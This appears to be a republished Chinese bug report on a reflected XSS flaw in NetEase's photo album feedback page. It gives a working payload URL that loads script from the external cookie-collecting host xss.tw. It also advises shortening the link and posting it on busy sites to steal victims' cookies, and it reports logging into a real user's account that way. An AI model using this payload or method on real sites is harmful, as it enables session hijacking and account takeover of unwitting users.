网站地图    收藏   

主页 > 后端 > 网站安全 >

网易相册反射型xss,可拿用户cookie(含有结果和

来源:自学PHP网    时间:2015-04-17 11:59 作者: 阅读:

[导读] 网易相册用户意见反馈存在反射型xss,可轻易拿到用户cookie。前面提交了,剑总说没有证明案例,特此提交。。。囧1、在网易相册用户意见反馈存处,提问问题,然后访问自己得问题,...

网易相册用户意见反馈存在反射型xss,可轻易拿到用户cookie。
前面提交了,剑总说没有证明案例,特此提交。。。囧

1、在网易相册用户意见反馈存处,提问问题,然后访问自己得问题,此处未对用户的提问内容进行任何过滤,导致存在xss。
 
构造url如下:http://fankui.163.com/ft/question.fb?pid=3&cid=33518918&type=0&pno=1%22%3E%3Cimg%20src=1%20onerror=%22alert%28/xss/%29%22%3E%3Cscript%20src=http://xss.tw/762%3Ealert%281%29%3C/script%3E
 
此处存在两处xss,出发点,从页面源代码中也可以看出来
 
 
2、由于构造的url太长,可以使用shorten url:
 
http://goo.gl/RW5AQ
将此url发到网易微博或者其他交互量大的地方,只要受害者点击url就能触发xss,拿到受害者的网易cookie。
 
 
不知道这是哪个用户,拿到其cookie,登陆如下:
 


 
修复方案:

过滤! 
 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论